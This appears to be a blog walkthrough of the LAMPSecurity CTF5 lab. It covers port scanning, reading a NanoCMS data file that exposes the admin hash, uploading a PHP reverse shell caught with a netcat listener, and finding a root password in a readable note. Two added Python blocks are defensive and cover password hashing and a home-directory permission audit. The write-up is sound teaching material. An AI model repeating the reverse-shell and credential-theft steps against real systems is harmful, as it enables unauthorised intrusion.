Core dump overflow


Pentest lab - LAMPSecurity CTF5


Continuing the LAMPSecurity series, the next machine I’m going after is CTF5.

Recon

An Nmap scan reveals plenty of open ports:

nmap -sS -sV -p1-65535 192.168.80.154

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-05-09 12:17 EDT
Nmap scan report for 192.168.80.154
Host is up, received arp-response (0.00024s latency).
Not shown: 65524 closed ports
Reason: 65524 resets
PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 64 OpenSSH 4.7 (protocol 2.0)
25/tcp    open  smtp        syn-ack ttl 64 Sendmail 8.14.1/8.14.1
80/tcp    open  http        syn-ack ttl 64 Apache httpd 2.2.6 ((Fedora))
110/tcp   open  pop3        syn-ack ttl 64 ipop3d 2006k.101
111/tcp   open  rpcbind     syn-ack ttl 64 2-4 (RPC #100000)
139/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: MYGROUP)
143/tcp   open  imap        syn-ack ttl 64 University of Washington IMAP imapd 2006k.396 (time zone: -0400)
445/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: MYGROUP)
901/tcp   open  http        syn-ack ttl 64 Samba SWAT administration server
3306/tcp  open  mysql       syn-ack ttl 64 MySQL 5.0.45
38972/tcp open  status      syn-ack ttl 64 1 (RPC #100024)

I searched for exploits for the versions of the listed services, but I couldn’t find anything usable. So it’s back to the web server.

Web server

The website provides some potential entry points that we’ll have to take a closer look at:

[image: phake org website]

We can register for a mailing list:

[image: mailing list sign-up form]

Tampering with the about page URL http://192.168.80.154/?page=about gives errors, so local file inclusion (LFI) might be possible.

The blog page also links to an admin login page and to a SquirrelMail webmail page:

[image: blog page]

The contact form allows you to send a message to the staff, and there is another app that acts as an event manager:

[image: event planner application]

Also, on port 901 there is a Samba SWAT server protected by basic authentication. This server provides a web-based interface for configuring Samba.

Exploiting the CMS

I made an account on the event manager, but that doesn’t seem to help me much besides creating new blog posts. Next I tested to see if there might be any SQLi in the contact form, but no luck there either. And despite the path traversal error, I wasn’t able to navigate to any arbitrary files on the system.

It turns out I had actually overlooked an important piece of information. On Andy Carp’s blog, we can see the site is powered by NanoCMS. I noticed it but didn’t give it any thought. When I finally thought to click on it and learn more, it took me to a domain-for-sale page, so I figured it might be some simulated CMS created for this challenge only. Good that I thought to google it and see how wrong I was :p NanoCMS is a lightweight PHP-based CMS that is now discontinued. However, I found a super useful NanoCMS security review that made it possible to compromise the target ;)

Among the vulnerabilities present in the CMS, there is one that allows unrestricted access to /data/pagesdata.txt. This file contains the username and password hash of the administrator:

a:12:{s:8:"homepage";s:1:"1";s:10:"links_cats";a:4:{s:7:"sidebar";a:2:{i:0;i:1;i:1;i:4;}s:11:"other-pages";a:0:{}s:14:"top-navigation";a:2:{i:0;s:1:"1";i:1;s:1:"4";}s:12:"Footer-Right";a:2:{i:0;s:1:"1";i:1;s:1:"4";}}s:5:"slugs";a:2:{i:1;s:4:"home";i:4;s:7:"contact";}s:6:"titles";a:2:{i:1;s:4:"Home";i:4;s:7:"Contact";}s:10:"slug_count";i:11;s:8:"settings";a:3:{s:19:"index-last-modified";i:1234513760;s:18:"def-template-areas";a:4:{i:0;s:12:"website name";i:2;s:14:"website slogan";i:3;s:16:"below navigation";i:4;s:16:"copyright notice";}s:18:"def-template-links";a:2:{i:0;s:14:"top-navigation";i:1;s:12:"Footer-Right";}}s:13:"active-tweaks";a:2:{i:0;s:7:"deutsch";i:1;s:19:"language-pack-tweak";}s:11:"lang-select";s:7:"english";s:6:"seourl";s:1:"0";s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

I cracked the hash with my favorite online cracker and found out the password is shannon. Next, I logged in to the admin panel:

[image: NanoCMS admin panel]
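Why the admin hash fell so quickly is worth spelling out. The value in pagesdata.txt is a bare 32-character hex digest with no salt and no work factor, so identical passwords always produce identical digests and a precomputed table answers it instantly; that is all an online cracker does. The Python below is an added example and is not code from this write-up or from NanoCMS. It assumes the CMS stored an unsalted MD5 of the password (the write-up only shows the digest, whose length is consistent with MD5), contrasts that with a salted, iterated PBKDF2 record, and adds a small audit function that flags credential records still stored in the bare-digest form. The iteration count and record format are my own choices.

```python
# Added example: unsalted digest vs. salted PBKDF2 record, plus an audit that
# flags records still in the bare-digest form. Not part of the original post.
import hashlib
import hmac
import os
import re

ITERATIONS = 200_000  # PBKDF2-HMAC-SHA256 work factor (assumed value)
BARE_HEX_DIGEST = re.compile(r"^[0-9a-f]{32}$")  # 32 hex chars: MD5-sized digest


def weak_hash(password: str) -> str:
    """Unsalted MD5, the kind of digest that sat in pagesdata.txt.
    Deterministic: same password, same digest, so a lookup table or a
    public cracking service answers it without any brute force."""
    return hashlib.md5(password.encode()).hexdigest()


def store_password(password: str) -> str:
    """Build a salted, iterated record: 'pbkdf2_sha256$iters$salt$digest'.
    A fresh random salt means two users with the same password get
    different records and precomputed tables are useless."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the digest from the stored salt and iteration count and
    compare in constant time so the comparison leaks no timing information."""
    try:
        algo, iters, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def audit_records(records: dict) -> list:
    """Return the usernames whose stored credential is a bare 32-hex digest
    (no salt, no algorithm tag), i.e. the form exposed on this box."""
    return sorted(user for user, rec in records.items() if BARE_HEX_DIGEST.match(rec))


if __name__ == "__main__":
    # Constructed sample: the admin record from the write-up beside a salted one.
    sample = {
        "admin": "9d2f75377ac0ab991d40c91fd27e52fd",  # digest shown in pagesdata.txt
        "alice": store_password("correct horse battery staple"),
    }
    print("records in bare-digest form:", audit_records(sample))
    print("same input, same weak digest:", weak_hash("x") == weak_hash("x"))
    print("same input, different salted records:",
          store_password("x") != store_password("x"))
```

The audit is deliberately narrow: it only catches the exact failure seen here (a digest with no salt and no algorithm tag). A real credential store review would also check iteration counts and algorithm choice, but the point of this box is that the digest could be cracked by lookup alone.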

Now we have the ability to add new pages with our own PHP code. I used pentestmonkey’s reverse PHP shell. I changed the IP and port, and set up a netcat listener to catch the reverse connection. Then I clicked on the newly created page on the blog and looked to my netcat for the goodies:

nc -vvnlp 5555
listening on [any] 5555 ...
connect to [192.168.80.155] from (UNKNOWN) [192.168.80.154] 43028
Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686 i686 i386 GNU/Linux
 11:02:41 up  3:30,  0 users,  load average: 0.24, 0.05, 0.02
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-3.2$ whoami
apache

Time for some enumeration! Looking in /home, I noticed quite a few user folders:

sh-3.2$ ls
amy
andy
jennifer
loren
patrick

I looked inside them with ls -al. The content was very similar among them and I could find nothing interesting in the files I was allowed to read, until I got to patrick’s directory, which contained more hidden files than the others:

sh-3.2$ ls -al patrick
total 344
drwxrwxr-x 25 patrick patrick 4096 Dec  5  2012 .
drwxr-xr-x  7 root    root    4096 Apr 28  2009 ..
-rw-------  1 patrick patrick    0 Dec  5  2012 .ICEauthority
drwx------  2 patrick patrick 4096 Apr 28  2009 .Trash
-rw-------  1 patrick patrick  530 Dec  5  2012 .bash_history
-rw-r--r--  1 patrick patrick   33 Aug 31  2007 .bash_logout
-rw-r--r--  1 patrick patrick  176 Aug 31  2007 .bash_profile
-rw-r--r--  1 patrick patrick  124 Aug 31  2007 .bashrc
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 .config
-rw-r--r--  1 patrick patrick   28 Apr 29  2009 .dmrc
drwxrwxr-x  8 patrick patrick 4096 Apr 29  2009 .evolution
drwx------  5 patrick patrick 4096 Dec  5  2012 .gconf
drwx------  2 patrick patrick 4096 Dec  5  2012 .gconfd
drwxrwxr-x  3 patrick patrick 4096 Apr 28  2009 .gnome
drwxr-xr-x  7 patrick patrick 4096 Dec  5  2012 .gnome2
drwx------  2 patrick patrick 4096 Apr 28  2009 .gnome2_private
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 .gstreamer-0.10
-rw-rw-r--  1 patrick patrick  146 Dec  5  2012 .gtk-bookmarks
-rw-r--r--  1 patrick patrick   89 Apr 28  2009 .gtkrc-1.2-gnome2
drwxr-xr-x  3 patrick patrick 4096 Apr 28  2009 .local
-rw-rw-r--  1 patrick patrick   18 Apr 29  2009 .mailboxlist
drwx------  3 patrick patrick 4096 Apr 28  2009 .metacity
drwx------  3 patrick patrick 4096 Apr 28  2009 .mozilla
-rw-------  1 patrick patrick   37 Apr 29  2009 .mysql_history
drwxr-xr-x  3 patrick patrick 4096 Dec  5  2012 .nautilus
-rw-rw-r--  1 patrick patrick  773 Dec  5  2012 .recently-used.xbel
drwxrwxr-x  4 patrick patrick 4096 Dec  5  2012 .tomboy
-rw-r--r--  1 patrick patrick 5128 Dec  5  2012 .tomboy.log
drwxr-xr-x  2 patrick patrick 4096 Dec  5  2012 .wapi
-rw-r--r--  1 patrick patrick  847 Dec  5  2012 .xsession-errors
-rw-r--r--  1 patrick patrick  658 Oct 11  2007 .zshrc
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Desktop
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Documents
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Download
-rw-------  1 patrick patrick  509 Apr 29  2009 Drafts
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Music
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Pictures
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Public
-rw-------  1 patrick patrick 4329 Apr 29  2009 Sent
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Templates
-rw-------  1 patrick patrick 1243 Apr 29  2009 Trash
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Videos
-rwxrw----  1 patrick patrick    0 Apr 29  2009 test.txt

I couldn’t read the .mysql_history or test.txt files, but the next one I tried, the .tomboy.log file, was really interesting! I only show the interesting bits here:

sh-3.2$ cat .tomboy.log
...
12/5/2012 7:24:34 AM [DEBUG]: Creating Buffer for 'New Note 3'...
12/5/2012 7:24:34 AM [DEBUG]: New Note 3 tags:
12/5/2012 7:24:38 AM [DEBUG]: Saving 'New Note 3'...
12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...
12/5/2012 7:27:41 AM [DEBUG]: Received request for saving session
12/5/2012 7:27:41 AM [DEBUG]: Saving unsaved notes...
12/5/2012 7:27:41 AM [DEBUG]: All done.  Ciao!

Tomboy is a note-taking application, and it looks like the root password was saved in a note?! I went to the .tomboy directory and found some notes:

sh-3.2$ ls
481bca0d-7206-45dd-a459-a72ea1131329.note
addin-db-000
addins
ae9cfc26-64e8-4f6f-a8b4-0296e8173504.note
d2684fad-3aab-444c-b90a-4f307c0818f6.note
manifest.xml

Found the jackpot in the first one!

sh-3.2$ cat 481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
...

Now all that is left is to become root! I SSH’ed in with the root credentials, and the machine is mine now!

Concluding remarks

This was another cool challenge in the LAMPSecurity series! The exploitation was possible because of the vulnerable CMS that not only disclosed credentials, but also allowed an attacker to execute code on the target. Although the foothold gained was under an unprivileged user, certain files of the home directories were readable when they shouldn’t have been, and the root password was sitting in an unprotected file for anyone to read. A good example of how a chain of misconfigurations can lead to total compromise of a machine.
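The two misconfigurations that turned an apache shell into root are both visible in the ls -al listing above: patrick’s home directory is mode 0775, so any local user can enter and list it, and .tomboy.log and the note files are mode 0644, so any local user can read them, while .mysql_history and test.txt (0600 and 0660) were correctly out of reach. The Python below is an added example, not part of the write-up, that audits a /home tree for exactly those two conditions. The list of "sensitive" name patterns and the constructed sample tree, which mirrors the permissions from patrick’s listing, are my own assumptions; point audit_home_tree at a real /home to run it for real.

```python
# Added example: audit a /home tree for homes that other users can enter and
# for sensitive files (logs, notes, histories, mailboxes) readable by others.
# Not part of the original write-up; sample tree is constructed.
import os
import stat
import tempfile

# Name patterns treated as sensitive (assumed list, extend as needed).
SENSITIVE_SUFFIXES = (".log", ".note", "_history", ".xbel")
SENSITIVE_NAMES = {"Sent", "Drafts", "Trash"}


def is_sensitive(name: str) -> bool:
    return name in SENSITIVE_NAMES or name.endswith(SENSITIVE_SUFFIXES)


def audit_home_tree(root: str) -> list:
    """Return human-readable findings for every user directory under root.
    A home with r or x for 'other' is reported once; every sensitive regular
    file with r for 'other' is reported with its mode. Files are reported
    even when the enclosing directory blocks others, since a later chmod on
    the directory would expose them (defence in depth)."""
    findings = []
    for user in sorted(os.listdir(root)):
        home = os.path.join(root, user)
        if not os.path.isdir(home):
            continue
        dmode = stat.S_IMODE(os.lstat(home).st_mode)
        if dmode & (stat.S_IROTH | stat.S_IXOTH):
            findings.append(
                f"{user}: home directory mode {dmode:04o} lets other users list or enter it"
            )
        for dirpath, _dirnames, filenames in os.walk(home):
            for name in filenames:
                path = os.path.join(dirpath, name)
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue  # skip symlinks, sockets, etc.
                fmode = stat.S_IMODE(st.st_mode)
                if fmode & stat.S_IROTH and is_sensitive(name):
                    rel = os.path.relpath(path, root)
                    findings.append(f"{rel}: readable by others (mode {fmode:04o})")
    return findings


def build_sample_tree() -> str:
    """Create a constructed /home look-alike that mirrors the permissions seen
    on the CTF box: patrick's home is 0775 with a world-readable Tomboy log
    and note, while his MySQL history and test.txt are private; amy's home
    is locked down. Returns the temporary root path."""
    root = tempfile.mkdtemp(prefix="home-audit-")
    layout = {
        # (relative path, mode); directories end with "/"
        "patrick/": 0o775,
        "patrick/.tomboy.log": 0o644,
        "patrick/.tomboy/": 0o775,
        "patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note": 0o644,
        "patrick/.mysql_history": 0o600,
        "patrick/test.txt": 0o660,
        "patrick/Sent": 0o600,
        "amy/": 0o700,
        "amy/.bash_history": 0o600,
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel.rstrip("/"))
        if rel.endswith("/"):
            os.makedirs(path, exist_ok=True)
        else:
            with open(path, "w") as fh:
                fh.write("constructed sample content\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for line in audit_home_tree(build_sample_tree()):
        print(line)
```

Run as root against a real /home the walk sees everything; run as an ordinary user it only reports what that user can already reach, which is itself a useful view of what an unprivileged foothold like the apache shell above would have been able to read.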

/ It's lucky you're going so slowly, \
| because you're going in the wrong  |
\ direction.                         /
 ------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
